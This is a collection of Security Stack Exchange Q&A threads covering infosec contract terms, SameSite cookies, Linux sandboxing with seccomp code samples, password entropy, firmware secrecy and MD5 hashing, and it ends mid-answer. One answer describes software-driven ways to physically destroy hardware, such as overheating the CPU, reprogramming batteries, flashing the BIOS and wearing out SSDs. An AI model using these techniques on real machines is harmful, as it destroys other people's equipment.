I am a software tester, InfoSec is mostly tangential to my job, and people only ask me questions about InfoSec because I am not afraid to use Google or Stack Exchange when I don't know something. (which is most of the time) Our US operations manager wants to have a conversation with me to learn more about Information Security. He got an email from a prospect in the financial sector that includes this section: (a) ACME will ensure its information security program (“Info Security Program”) is designed and implemented, and during the term of this Agreement will continue to be designed and implemented, to: (1) reasonably and adequately mitigate any risks identified by either of the parties related to the Software and Services, and the protection of Customer Confidential Information disclosed to ACME or ACME Personnel, and (2) describe and report on its own risk assessments, risk management, control, and training of ACME Personnel in compliance with the Info Security Program, security oversight regarding ACME Personnel, and the process for the annual certification of the Info Security Program. ACME will safeguard against the destruction, loss, alteration, or unauthorized disclosure of or access to Customer Confidential Information in the possession of ACME Personnel, including through the use of encryption while transmitted or in transport, or while being stored, processed or managed on ACME equipment when such encryption required by Law, is advised by industry standards for similar products or services, or is required in an Transaction Document (collectively, the “Data Safeguards”). ACME will ensure that the Info Security Program is materially equivalent to Customer’s own information security standards in place from time to time applicable to the risks presented by the Products or Services (collectively the “IS Standards”). The parties may redefine the term “IS Standards” to mean any industry-recognized standard or testing protocol (e.g., NIST, ISO 27001/27002 or SSAE, AT101), if expressly set forth in an SOW. This language is so scary that I first pooped in my pants, and then created a security.stackexchange.com account to ask for advice because I don't even know where to start. We are a small software company (less than 40 people) that is fortunate enough to have some commercial success, and we're not careless about security, but we don't have any formal Information Security Program (yet). Some questions: Can someone please translate the above quote into common English? I read something about annual certification, would it be ok to say that our company should make use of a third party security auditor and let them tell us what we should do? Who within our organisation would typically be responsible for implementing an Information Security Program? I am thinking about recommending to buy ISO27001 (I mean the actual PDF file that contains the text of that standard, which can be purchased for 166 Swiss Franks from the iso.org store), but who should read it? (related to the previous question) Background information: We collect typical CRM information to be able to send invoices. We do not collect sensitive information, like data about the users/customers of our customers. Our support team may ask sample data for troubleshooting purposes, and will always ask for "dummy" or sanitized data that reproduces the issue at hand. This question is not a duplicate of How to communicate how secure your system is to your employer's clients . That posts is about how to communicate to customers - we already know that because the customer already told us which kind of communication they want - they mentioned a SOC Type 1 Report. It is also not a duplicate of How to get top management support for security projects? because management support is easy in our case: get security certified or miss out on big contracts.
I'll give it a shot. In a nutshell, the language is CYA in case you get breached or hacked and have access to their data, they can tell their customers "Acme said they had a security program and was protected so this is their fault". In that case if you end up being the cause of them losing data, they can blame you. That being said, its pretty standard contract language when companies are partnering or sharing data. Mostly its a "Due Diligence" type artifact. Regarding your questions: Can someone please translate the above quote into common English? Basically you need to have documented security policies/procedures. Within those documents you should state what you do to maintain systems and ensure that adequate security is provided. You should also try and address actual procedures that touch on security related subjects (access control, auditing, monitoring, incident response, etc.). You may already cover some of this in your normal Standard Operating Procedures (SOP) and you can reference those documents. When you create a new user or change groups/roles, are there written procedures for how to to it? Is there someone who approves that change? Those are the kinds of things that should be addressed. When they aren't written down, people don't have references for how to do them and they take liberties which may introduce security vulnerabilities. I read something about annual certification, would it be ok to say that our company should make use of a third party security auditor and let them tell us what we should do? This is the route a lot of organizations take, but security is definitely not something that should be reviewed "annually". It is an ongoing, forever process that should be integrated into your daily operations. That being said, a third party group can perform an "audit" that serves as your annual certification. The result of that will be a report that you can used to fix deficiencies and enhance your security posture. Highly recommend this, no matter how mature your security program is. The first few times you go through it, use different vendors so that you can compare the results. The quality of these types of assessments varies GREATLY. Who within our organisation would typically be responsible for implementing an Information Security Program? They go by many names, but the ultimate responsibility of security will lie with the system owner. That could be your CEO, the program manager, or in larger organizations an ISSO or Information System Security Officer. In smaller organizations, it usually falls to a Product or IT Manager. Hiring a consultant to help start this process may be a good idea at this stage. You're only going to see these requirements more often as you start working/partnering with large enterprises. I am thinking about recommending to buy ISO27001, but who should read it? (related to the previous question) What exactly are you considering buying ? ISO27001 is a security compliance framework that provides a direction for securing your assets/enterprise and as far as I know you shouldn't have to pay for anything upfront unless its a service or product. Choosing a compliance framework to base your program off of is a great first step in establishing a security program. I would personally recommend ISO or NIST as they are large international/national standards and have a lot of overlap with other compliance frameworks (PCI, HIPAA, etc.). That being said, I have no idea what your goals are so you'll have to do some research and choose what's best for your organization. I've written a lot of documentation and done a lot of security control testing so I may be opinionated at this point, but if you have additional questions, feel free to PM me. Good luck!
{ "source": [ "https://security.stackexchange.com/questions/168344", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157803/" ] }
168,365
Is setting Same-Site attribute of a cookie to Lax the same as not setting it at all? If there are differences what are they?
Is setting Same-Site attribute of a cookie to lax the same as not setting the Same-Site attribute? In Google Chrome < 76 – no. Setting SameSite=lax is safer than omitting the attribute. (But if your implementation currently relies on cross-origin requests, double-check that adding the attribute doesn't break anything.) Here are the differences: When you don't set the SameSite attribute, the cookie is always sent. With SameSite=lax , the cookie is only sent on same-site requests or top-level navigation with a safe HTTP method. That is, it will not be sent with cross-domain POST requests or when loading the site in a cross-origin frame, but it will be sent when you navigate to the site via a standard top-level <a href=...> link. With SameSite=strict (or an invalid value), the cookie is never sent in cross-site requests. Even when clicking a top-level link on a third-party domain to your site, the browser will refuse to send the cookie. Starting with Chrome 76 , your browser has an option to make no SameSite behave like Samesite=Lax . This will be default in Chrome 80 . From the feature description: The Stable version of Chrome 80 is targeted for enabling this feature by default. The feature will be enabled in the Beta version only, starting in Chrome 78. This feature is available as of Chrome 76 by enabling the same-site-by-default-cookies flag. Also have a look at the RFC draft and Sjoerd's blog post .
{ "source": [ "https://security.stackexchange.com/questions/168365", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157829/" ] }
168,452
What I would like to know is two fold: First off, what is sandboxing? Is it the trapping of OS system calls and then secondly deciding whether to allow it to pass through or not? How is it implemented to begin with? Would it be by way of hooks in the SSDT (kernel level)?
Well this answer ended up fairly long, but sandboxing is a huge topic. At its most basic, sandboxing is a technique to minimize the effect a program will have on the rest of the systems in the case of malice or malfunction. This can be for testing or for enhancing the security of a system. The reason one might want to use a sandbox also varies, and in some cases it is not even related to security, for example in the case of OpenBSD's systrace . The main uses of a sandbox are: Program testing to detect broken packages, especially during builds. Malware analysis to understand behavior of malicious software. Securing untrusted or unsafe applications to minimize damage they can do. There are many sandboxing techniques, all with differing threat models. Some may just reduce attack surface area by limiting APIs that can be used, while others define access controls using formalized models similar to Bell-LaPadula or Biba . I'll be describing a few popular sandboxing techniques, mostly for Linux, but I will also touch on other operating systems. Seccomp Seccomp is a Linux security feature that reduces kernel attack surface area. It is technically a syscall filter and not a sandbox, but is often used to augment sandboxes. There are two types of seccomp filters, called mode 1 (strict mode) and mode 2 (BPF mode). Mode 1 Seccomp mode 1 is the most strict, and original, mode. When a program enables mode 1 seccomp, it is limited to using only four hardcoded syscalls : read() , write() , exit() , and rt_sigreturn() . Any file descriptors that will be needed must be created before enforcing seccomp. In the case of a violation, the offending process is terminated with SIGKILL . Taken from another answer I wrote on another StackExchange site, a sample program that securely executes a function that returns 42 in bytecode: #include <unistd.h> #include <stdint.h> #include <stdio.h> #include <sys/prctl.h> #include <sys/syscall.h> #include <linux/seccomp.h> /* "mov al,42; ret" aka "return 42" */ static const unsigned char code[] = "\xb0\x2a\xc3"; int main(void) { int fd[2], ret; /* spawn child process, connected by a pipe */ pipe(fd); if (fork() == 0) { close(fd[0]); /* enter mode 1 seccomp and execute untrusted bytecode */ prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); ret = (*(uint8_t(*)())code)(); /* send result over pipe, and exit */ write(fd[1], &ret, sizeof(ret)); syscall(SYS_exit, 0); } else { close(fd[1]); /* read the result from the pipe, and print it */ read(fd[0], &ret, sizeof(ret)); printf("untrusted bytecode returned %d\n", ret); return 0; } } Mode 2 Mode 2 seccomp, also called seccomp-bpf, involves a userspace-created policy being sent to the kernel , defining which syscalls are permitted, what arguments are allowed for those syscalls, and what action should be taken in the case of a syscall violation. The filter comes in the form of BPF bytecode, a special type instruction set that is interpreted in the kernel and used to implement filters. This is used in the Chrome/Chromium and OpenSSH sandbox on Linux, for example. A simple program that prints the current PID using seccomp-bpf: #include <seccomp.h> #include <unistd.h> #include <stdio.h> #include <errno.h> int main(void) { /* initialize the libseccomp context */ scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); /* allow exiting */ seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); /* allow getting the current pid */ seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); /* allow changing data segment size, as required by glibc */ seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); /* allow writing up to 512 bytes to fd 1 */ seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2, SCMP_A0(SCMP_CMP_EQ, 1), SCMP_A2(SCMP_CMP_LE, 512)); /* if writing to any other fd, return -EBADF */ seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1, SCMP_A0(SCMP_CMP_NE, 1)); /* load and enforce the filters */ seccomp_load(ctx); seccomp_release(ctx); printf("this process is %d\n", getpid()); return 0; } Because the Linux syscall ABI keeps arguments in general purpose registers, only these registers are validated by seccomp. This is fine in some cases, such as when an argument is a bitwise ORed list of flags, but in cases where the argument is a pointer to memory, filtering will not work. The reason for this is that the pointer only references memory, so validating the pointer only ensure that the pointer itself is allowed, not that the memory it is referencing has not been changed. This means that it is not possible to reliably filter certain arguments for syscalls like open() (where the path is a pointer to a null-terminated string in memory). To filter paths and similar objects, mandatory access controls or another LSM-based framework must be used. Pledge OpenBSD has added a syscall filter similar to (but more coarse-grained than) seccomp called pledge (previously tame ). Pledge is a syscall that applications can opt into, essentially "pledging" that they will limit their uses of various kernel interfaces. No matter how much the application begs, the kernel won't revoke the restrictions once they are in place, even if it changes its mind . Pledge allows an application to make a promise , which is a group of actions which will be permitted, with all others being denied. In essence, it is promising to only use functions it explicitly requests beforehand. Some (non-exhaustive) examples: The stdio promise allows basic functionality like closing file descriptors or managing memory. The rpath promise allows syscalls that can be used to read the filesystem. The wpath promise allows syscalls that can be used to write to the filesystem. The tmppath promise allows syscalls that can read/write, but only in /tmp . The id promise allows syscalls that are used to change credentials, like setuid() . Although pledge is much more coarse-grained than seccomp, it is, for this reason, much easier to use and maintain. Because of this, OpenBSD has progressed to adding pledge support to a wide variety of their base applications, from things as security-sensitive as sshd to things as trivial as cat . This "security by default" architecture ends up greatly improving the security of the system as a whole, even if individual promises are coarse-grained and not particularly flexible. Chroot A chroot is a *nix feature that allows setting a new path as the root directory for a given program, forcing it to see everything as relative to that path. This is not usually used for security, since a privileged program can often escape a chroot , and because it does not isolate IPC or networking, allowing even unprivileged processes to do mischief like killing other processes. In a touch, it can be used to augment other security techniques. It is very useful for preventing an application from doing accidental damage, and for giving legacy software a view of the filesystem that it expects. Chrooting bash , for example, would involve putting any executables and libraries it needs into the new directory, and running the chroot utility (which itself just calls the syscall of the same name ): host ~ # ldd /bin/bash linux-vdso.so.1 (0x0000036b3fb5a000) libreadline.so.6 => /lib64/libreadline.so.6 (0x0000036b3f6e5000) libncurses.so.6 => /lib64/libncurses.so.6 (0x0000036b3f47e000) libc.so.6 => /lib64/libc.so.6 (0x0000036b3f0bc000) /lib64/ld-linux-x86-64.so.2 (0x0000036b3f938000) host ~ # ldd /bin/ls linux-vdso.so.1 (0x000003a093481000) libc.so.6 => /lib64/libc.so.6 (0x000003a092e9d000) /lib64/ld-linux-x86-64.so.2 (0x000003a09325f000) host ~ # mkdir -p newroot/{lib64,bin} host ~ # cp -aL /lib64/{libreadline,libncurses,libc}.so.6 newroot/lib64 host ~ # cp -aL /lib64/ld-linux-x86-64.so.2 newroot/lib64 host ~ # cp -a /bin/{bash,ls} newroot/bin host ~ # pwd /root host ~ # chroot newroot /bin/bash bash-4.3# pwd / bash-4.3# ls bin lib64 bash-4.3# ls /bin bash ls bash-4.3# id bash: id: command not found Only a process with the CAP_SYS_CHROOT capability is able to enter a chroot. This is necessary to prevent a malicious program from creating its own copy of /etc/passwd in a directory it controls, and chrooting into it with a setuid program like su , tricking the binary into giving them root. Namespaces On Linux, namespaces are used to isolate system resources, giving a namespaced program a different understanding of what resources it owns. This is commonly used to implement containers. From the namespaces(7) manpage: A namespace wraps a global system resource in an abstraction that makes it appear to the process within the namespace that they have their own isolated instance of a global resource. Changes to the global resource are visible to other processes that are members of the namespace, but are invisible to other processes. There are 7 namespaces supported under Linux currently: cgroup - Cgroup root directory IPC - System V IPC and POSIX message queues Network - Network interfaces, stacks, ports, etc Mount - Mountpoints, similar in function to a chroot PID - Process IDs User - User and group IDs UTS - Hostname and domain name An example of PID namespaces using the unshare utility: host ~ # echo $$ 25688 host ~ # unshare --fork --pid host ~ # echo $$ 1 host ~ # logout host ~ # echo $$ 25688 While these can be used to augment sandboxing or even be used as an integral part of a sandbox, some of them can reduce security. User namespaces, when unprivileged (the default), expose a much greater attack surface area from the kernel. Many kernel vulnerabilities are exploitable by unprivileged processes when the user namespace is enabled. On some kernels, you can disable unprivileged user namespaces by setting kernel.unprivileged_userns_clone to 0, or, if that specific sysctl is not available on your system, setting user.max_user_namespaces to 0. If you are building your own kernel, you can set CONFIG_USER_NS=n to disable user namespaces globally. Mandatory Access Controls A MAC is a framework for defining what a program can and cannot do, on a whitelist basis. A program is represented as a subject . Anything the program wants to act on, such as a file, path, network interface, or port is represented as an object . The rules for accessing the object are called the permission , or flag. Take the AppArmor policy for the ping utility, with added comments: #include <tunables/global> /bin/ping { # use header files containing more rules #include <abstractions/base> #include <abstractions/consoles> #include <abstractions/nameservice> capability net_raw, # allow having CAP_NET_RAW capability setuid, # allow being setuid network inet raw, # allow creating raw sockets /bin/ping mixr, # allow mmaping, executing, and reading /etc/modules.conf r, # allow reading } With this policy in place, the ping utility, if compromised, cannot read from your home directory, execute a shell, write new files, etc. This kind of sandboxing is used for securing a server or workstation. Other than AppArmor, some popular MACs include SELinux , TOMOYO , and SMACK . These are typically implemented in the kernel as a Linux Security Module , or LSM. This is a subsystem under Linux that provides modules with hooks for various actions (like changing credentials and accessing objects) so they can enforce a security policy. Hypervisors A hypervisor is virtualization software. It usually leverages hardware features that allow isolating all system resources, such as CPU cores, memory, hardware, etc. A virtualized system believes not just that it has root, but that it has ring 0 (kernelmode). Hardware is either abstracted by the CPU (the case for the CPU cores and memory itself), or emulated by the hypervisor software (for more complex hardware, such as NICs). Because the guest is made to believe it owns the whole system, anything that can run on that architecture will tend to also run in the virtual machine, allowing a Linux host with a Windows guest, or a FreeBSD host with a Solaris guest. In theory , a hypervisor will prevent any actions in the guest from affecting the host. A useful resource that helps with a low-level understanding how a guest is set up is an LWN writeup on the KVM API . KVM is a kernel interface supported on Linux and Illumos (a family of open source forks of Solaris) for setting up virtual machines. As it's fairly low level (interaction only being through IOCTLs on a file descriptor opened against the /dev/kvm character device), it is typically the backend for projects like QEMU . KVM itself makes use of privileged hardware virtualization features such as VT-x on Intel processors and AMD-V on AMD. It's common for hypervisors, such as with the popular Cuckoo sandbox , to be used to assist in malware analysis. It creates a virtual machine that malware can be run on, and it analyzes the internal state of the system, reading memory contents, dumping memory, etc. Because it runs a full operating system, it is often more difficult for malware to realize it is running virtualized. Common techniques like attaching a dummy debugger to itself so it cannot be debugged can be fooled, though some malware can attempt to detect virtualization (with varying levels of sophistication). Hypervisor detection itself is a very broad and complex subject. Hypervisors are often (ab)used for security, such as by Qubes OS or Bromium (using the Xen hypervisor to isolate Fedora and Windows, respectively). Whether or not this is a good idea is often debated, due to bugs in Xen cropping up repeatedly. A famous and rather abrasive quote from Theo de Raddt, founder of OpenBSD, on the topic of virtualization when relied on for security: You are absolutely deluded, if not stupid, if you think that a worldwide collection of software engineers who can't write operating systems or applications without security holes, can then turn around and suddenly write virtualization layers without security holes. Whether or not a hypervisor is a good choice for security depends on many factors. It is typically easier to use and maintain, since it isolates an entire guest operating system, but it has a large attack surface area and does not provide fine-grained protections. Containers Containers are similar to hypervisors, but rather than using virtualization, they use namespaces. Each container has every resource put in its own namespace, allowing every container to run an independent operating system. The init process on the container sees itself as PID 1 running as root, but the host sees it as just another non-init and non-root PID. However, as they share the host's kernel, they can only run the same type of operating system as the host. Additionally, while containers can have root processes that can do privileged actions like setting up network interfaces (only in that container's namespace, of course), they cannot change global kernel settings that would affect all containers. Docker and OpenVZ are popular container implementations. Because containers fundamentally rely on user namespaces of various implementations (standard Linux namespaces for Docker, and a bespoke namespace technology for OpenVZ), they are often criticized for providing poor security . Container escapes and privilege escalation vulnerabilities are not uncommon on these systems. The reason for these security issues stems from the fact that the namespace root user can interact with the kernel in new and unexpected ways. While the kernel is designed not to let the namespace root user make any obviously dangerous changes to the system that cannot be kept in a namespace (like sysctl tweaks), the root is still able to interact with a lot more of the kernel than an unprivileged process. Because of this, a vulnerability that can only be exploited by root in the process of setting up a virtual network interface, for example, could be exploited by an unprivileged process if that process is able to enter a user namespace. This is an issue even if the syscalls can only "see" the network interface of the container. In the end, a user namespace simply allows an unprivileged user to interact with far more of the kernel. The surface area is increased to such an extent that many vulnerabilities that otherwise would be relatively harmless instead become LPEs. This is what happens when kernel developers tend not to keep a security mentality when writing code that only root can interact with. Other technologies Linux is certainly not the only operating system that has sandboxing. Many other operating systems have their own technology, implemented in various different ways and with varying threat models: AppContainer on Windows provides isolation similar to a combination of chroots and namespaces. Domains, files, networks, and even windows are isolated. Seatbelt on OSX acts as mandatory access controls, limiting the resources a confined application can access. It has seen its share of bypasses . Jails on FreeBSD build on the concept of chroot. It assigns an IP address to the program running in the jail and gives it its own hostname. Unlike a chroot, it is designed for security. Zones on Solaris are advanced containers that run a copy of Solaris' userland under the host's kernel. They are similar to FreeBSD Jails, but more feature-rich.
{ "source": [ "https://security.stackexchange.com/questions/168452", "https://security.stackexchange.com", "https://security.stackexchange.com/users/156881/" ] }
168,479
Could anyone point to a quote in a published work - or suggest a recognised expert who might provide a quote - which answers the following question How much entropy in a password would guarantee that it is secure against an offline guessing attack even if the attacker has the most powerful hardware in the world? I am writing an article about creating a secure password based on true randomness and I would like to include a figure for guaranteed security but I would rather not offer my own opinions and arguments, I would like to quote a recognised expert or published work. In more detail what is meant above by these terms is as follows. If a password has enough entropy then presumably it is uncrackable in our current threat model, which is the one where the attacker has a cryptographic hash of the password and is repeatedly making a password guess, hashing the guess and comparing the hash. By entropy I mean that the password creator has chosen randomly, with equal probability for each choice, a password from N possible passwords. The entropy in bits is then log₂(N) So quote needs to cover how much entropy in bits (or how big is N) to guarantee that the password is secure against this kind of attack, even if the attacker has the most powerful hardware in the world.
There's a quote for you in this crypto.SE answer , by Bruce Schneier in Applied Cryptography (1996), pp. 157–8. You can also find Bruce Schneier citing himself in his blog (2009), if you want an online citation. Here is the full quote, in case of the links breaking: One of the consequences of the second law of thermodynamics is that a certain amount of energy is necessary to represent information. To record a single bit by changing the state of a system requires an amount of energy no less than kT, where T is the absolute temperature of the system and k is the Boltzman constant. (Stick with me; the physics lesson is almost over.) Given that k = 1.38×10 -16 erg/°Kelvin, and that the ambient temperature of the universe is 3.2°Kelvin, an ideal computer running at 3.2°K would consume 4.4×10 -16 ergs every time it set or cleared a bit. To run a computer any colder than the cosmic background radiation would require extra energy to run a heat pump. Now, the annual energy output of our sun is about 1.21×10 41 ergs. This is enough to power about 2.7×10 56 single bit changes on our ideal computer; enough state changes to put a 187-bit counter through all its values. If we built a Dyson sphere around the sun and captured all of its energy for 32 years, without any loss, we could power a computer to count up to 2 192 . Of course, it wouldn’t have the energy left over to perform any useful calculations with this counter. But that’s just one star, and a measly one at that. A typical supernova releases something like 10 51 ergs. (About a hundred times as much energy would be released in the form of neutrinos, but let them go for now.) If all of this energy could be channeled into a single orgy of computation, a 219-bit counter could be cycled through all of its states. These numbers have nothing to do with the technology of the devices; they are the maximums that thermodynamics will allow. And they strongly imply that brute-force attacks against 256-bit keys will be infeasible until computers are built from something other than matter and occupy something other than space . Update: If you want a citation to assess the strength of a randomly generated password, you can use this website that is regularly updated with recommendations made by different institutes. A random password is equivalent to a symmetric key, so this is the value you are looking for. (Here is a wayback machine link , if this website were to close.)
{ "source": [ "https://security.stackexchange.com/questions/168479", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157934/" ] }
168,620
When working with Internet of Things devices, is it recommend to obfuscate or encrypt firmware images pushed to clients? This to make reverse engineering harder. (They should be signed of course)
No. You should not rely upon the obscurity of your firmware in order to hide potential security vulnerabilities that exist regardless of whether or not you encrypt/obfuscate your firmware. I have a radical suggestion: do the exact opposite. Make your firmware binaries publicly available and downloadable, freely accessible to anyone who wants them. Add a page on your site with details on how to contact you about security issues. Engage with the security community to improve the security of your product.
{ "source": [ "https://security.stackexchange.com/questions/168620", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128901/" ] }
168,681
Hypothetical scenario (please note that this is indeed hypothetical, and I would never dream of actually doing this. I'm asking out of curiosity.) I have a normal desktop computer with a clean installation of Windows 10 and no personal or sensitive data on the machine at all. The computer is not sharing a local network with any other devices. This is a normal system, and not a virtual machine. I give a malicious user remote access to this machine, through the software TeamViewer. The peripherals like USB keyboard, mouse, etc, are disconnected the moment he gets access. The malicious user can spend a few hours doing whatever they want. After the malicious user is done, the computer is immediately shut down. I then boot from a Linux live CD, format the internal drive of the computer, and install a clean installation of an operating system (Either Windows 10 or Debian, for example.) there are no other storage devices connected to the computer. In this case in what ways could my computer still be compromised or damaged? We can say that the malicious user knew I might format the drive, and prepared especially for that. They might simply have been interested in doing damage, or compromising the computer in some way.
On some CRT monitors there was a relay that was engaged when changing screen mode. By changing screen mode repeatedly very fast, it was possible to destroy this relay. Apparently some modern monitors can be wrecked by forcing them into invalid screen modes, but they must be pretty rubbish monitors. Someone has mentioned flashing the BIOS to wreck that. The microcode on some CPUs can be amended: wreck the CPU. If it is a laptop, it may be possible to wreck the battery by reprogramming it: http://www.pcworld.com/article/236875/batteries_go_boom.html With flash memory based SSDs or USB drives, re-write the same part of memory over and over to have it reach its end of life sooner. On a cheap hard drive, forcing the stepper motor to push the drive heads fully one way beyond the end of the drive and then step back, repeatedly, could knock the heads out of alignment. I've known drives where the heads could get stuck if sent beyond their proper range (Tulip brand PCs in the 1990s). I also wonder if you could change any BIOS settings such that the RAM or CPU or even GPU could be damaged, by overclocking or changing the board voltages. Cook the GPU by driving it hard after over-riding its automatic temperature control. Ditto for the CPU. Change BIOS settings to turn off the CPU fan then drive the CPU hard enough to cook it.
{ "source": [ "https://security.stackexchange.com/questions/168681", "https://security.stackexchange.com", "https://security.stackexchange.com/users/105562/" ] }
168,726
I have set a "3-d secure password" for my debit card, on my bank's website. But when I purchased something in amazon.co.uk, I went through the whole process without ever being asked for that 3D password. I was asked for a card number and its expiration date. Can anyone explain to me what happened? I live in Bulgaria. Note: I also wasn't asked for CVC.
Security measures like "3D password", CVV, etc. do not exist to protect you the cardholder . Do not assume that someone who lacks them can't use your card number fraudulently. All they do is allow a merchant who chooses to use them as part of their card processing merchant agreement to obtain a lower transaction fee, on the basis that the feature reduce the rate of fraudulent transactions and thus chargebacks. If anything, these features actually hurt you as the cardholder, as they make it easier for the merchant to "prove" you authorized a transaction and harder for you to dispute it. See my answer to a related question here: https://money.stackexchange.com/questions/54772/why-does-the-introduction-of-chip-pin-appear-to-be-so-controversial-in-the-uni/54780#54780
{ "source": [ "https://security.stackexchange.com/questions/168726", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103659/" ] }
168,807
I've heard that cookies is less secure than the session. For example, if a web uses a cookie to detect if an user has logged in or not, people can forge a cookie to simulate a false user because he can read the cookie and forge one easily. Here is a link that I've found: Session vs Cookie Authentication Now I'm using Tornado with python to build a website. Here is a simple example of the module of login with Tornado: https://stackoverflow.com/questions/6514783/tornado-login-examples-tutorials To my surprise, there is no session in Tornado. Its doc says that there is the secure cookies but I don't think it is safer than ordinary cookies. ordinary cookie: browser ------- I'm Tom, my password is 123 -------> server secure cookie: browser ------ &^*Y()UIH|>Guho976879 --------> server I'm thinking that if I could get &^*Y()UIH|>Guho976879 , I can still forge the cookie, right? If I'm correct, why doesn't Tornado have the session? Or is there some way that can make the secure cookie is the same secure as the session? Maybe that I erase the cookies when the browser is closed can be safer?
I've heard that cookies is less secure than the session. You must have misinterpreted something. In fact HTTP sessions are usually implemented using cookies. I'm thinking that if I could get &^*Y()UIH|>Guho976879, I can still forge the cookie, right? Sure you can change the cookie, but will it be accepted by the server as valid? If you take an actual look at the documentation you'll see: Cookies are not secure and can easily be modified by clients. If you need to set cookies to, e.g., identify the currently logged in user, you need to sign your cookies to prevent forgery . Tornado supports signed cookies with the set_secure_cookie and get_secure_cookie methods. ... Signed cookies contain the encoded value of the cookie in addition to a timestamp and an HMAC signature. If the cookie is old or if the signature doesn’t match, get_secure_cookie will return None just as if the cookie isn’t set . Thus, if you try to manipulate the secure cookie the framework will notice and treat the cookie as invalid, i.e. like the cookie was never sent in the first place.
{ "source": [ "https://security.stackexchange.com/questions/168807", "https://security.stackexchange.com", "https://security.stackexchange.com/users/155246/" ] }
169,169
One of the lesser used techniques for strong passwords is to use patterns or even straight up repetition, so it can be very long while still being memorable. For example: Thue-Morse 01101001100101101001 becomes 0110-3223-5445-6776-9889 increment parity 20 Fibonacci 1,1,2,3,5,8,13,21,34,55 becomes 0 0 1 2 4 7 12 20 33 54 one less than fibonacci Pi digits 3.1415926535 becomes after 3. is 14159 then 26535 Long prefix 11111119 and 19999999 are primes Repetition aall leetttteerrss aarree ddoouubbleedd eexxcceepptt l Keyboard layout !@@###$$$$%%%%%^^^^^^&&&&&&&********((((((((( Not the best examples but you get the idea. So an actual password might look like this: primes 235 LuA: LualuA LualualuA LualualualualuA Looks easy for humans, but the guessing algorithm surely doesn't know the connection between primes , 235 and the repetition of lua . There's a lot of patterns to work off of and a lot of possible mappings/mutations. Mappings can be layered as well. Words can then be inserted, and short prefixes and suffixes added. If the search space still wasn't large enough you could concatenate two of these to square the number of possible passwords. Is it practically unguessable or do these patterns weaken the passwords enough for specialized algorithms to be able to guess them easily? Their length and usage of non-words should make them immune to any existing password guessing methods as well, so at least they have that benefit. Extra: how much guessing entropy is actually in one of these passwords? There's not really any data to work off of but we could use Fermi estimation to get somewhat close.
As far as I can tell, the question is: They are practically unguessable, right? The answer is a very strong it depends on the kind of attack you're worried about . Also, in the best case, what you're doing is equally as strong as using a password manager's randomly generated passwords, but almost certainly more effort, right? @RoyceWilliams' answer pretty much hits the nail on the head: Generally speaking, if your method becomes weaker once it is known, you're doing it wrong. Let's break this down a little farther. There are two types of password brute-force attacks you need to worry about: Drive-by attacks Aka "opportunistic". Here the attacker is looking for low-hanging fruit: they are attacking all users of the system in parallel, either looking for a single entry-point into the system (in which case any user will do), or they are looking to compromise as many accounts as they can with minimal effort. They are unlikely to try any sort of "algorithmically-generated" lists, because they can get what they want simply by trying the 100,000 most common passwords based on this year's breaches. As long as your password is not on one of those "Top X Most Common Passwords" lists, you're pretty much immune already; you really don't need to go the extra effort. Targeted attacks Here you, and you specifically, have been selected as a target. Maybe there is data on your account that is of value to their employer, maybe you work for your company's IT help desk and sending a phishing email from your account is more likely to succeed. Whatever the reason, you specifically are being studied. They will find your social media posts. They will find your post on this site. They will pull up all passwords of yours from previous breaches to study how you invent your passwords. They will write software to generate guess-lists based on everything they know about you. If they know that you like to use mathematical constants, or quotes from Tolkien, or wtv, they will build the appropriate guess lists. Against a targeted attack, @RoyceWilliams' answer referencing Kerckhoffs's principle is relevant: your scheme needs to be secure even if the attacker knows what the scheme is. You may be clever enough to invent something that passes this test, but I'd bet that whatever you invent will be more effort than just using a password manager with 32-char random passwords. So do that. These two attack models are meant to be a framework for thinking about the threat landscape, not an exhaustive list of things attackers will do. As @Ben points out in comments, there is a sliding scale in between these two that has some characteristics of Drive-by, and some characteristics of Targeted. Where you put your comfort level is your choice; although if you're considering this at all then, for the minimal extra effort, you might as well go all the way to the top and use a password manager.
{ "source": [ "https://security.stackexchange.com/questions/169169", "https://security.stackexchange.com", "https://security.stackexchange.com/users/158637/" ] }
169,320
The site which I maintain has been in production for 3 years. When you register, the site generates a large (20 digit) random hex password for you. It's stored MD5 hashed unsalted. When I told the lead dev that MD5 is bad for passwords he said if bad guys get it there's no way they can crack it because the password is random. And even if the bad guy cracks it we generate it so users can't reuse it on other sites. How can I convince him that we need to use best practices? He is very stubborn...
Ok, so the site generates a random password for each user at registration time. An important question is whether a user can can manually set their password later, or if they are forced to use a random site-generated password. Let's look at the two cases separately. Random passwords As far as I can tell, this is the scenario you are describing in the question. Unfortunately, your dev is (mostly) right . At least about single iteration of hashing vs a big slow hash. Your question kinda has the flavour of blindly applying "best practices" without considering what those practices were intended for. For a brilliant example of this, here's a good read: The Guy Who Invented Those Annoying Password Rules Now Regrets Wasting Your Time Suggestion Do switch from MD5 to SHA256 , probably add a per-user salt, and maybe consider going to 32 char passwords. But adding a big slow hashing function will increase your server load for little to no added security (at least barring any other goofs in your implementation). Understanding hashing as a brute-force mitigation The amount of work a brute-force attacker who has stolen your database needs to do to crack password hashes is roughly: entropy_of_password * number_of_hash_iterations * slowness_of_hash_function where entropy_of_password is the number of possibilities, or "guessability" of the password. So long as this "formula" is higher than 128 bits of entropy (or equivalent work factor / number of hash instructions to execute), then you're good. For user-chosen passwords, the entropy_of_password is abysmally low, so you need lots of iterations (like 100,000) of a very slow hash function (like PBKDF2 or scrypt ) to get the work factor up. By "20 digits hex digits" I assume you mean that there are 16 20 = 2 80 possible passwords, which is lower than "best-practice" 2 128 , but unless you're a government or a bank, you probably have enough brute-force security from the entropy of the password alone. Salts also serve no purpose here because pre-computing all the hashes is like 2 80 * 32 bits/hash, which is roughly 1 ZB (or 5000 x the capacity of all hard drives on the planet combined ). Rainbow tables help this a bit, but quite frankly, any attacker capable of doing that, deserves to pwn all of us. You still want to hash the password to prevent the attacker from walking away the plaintext for 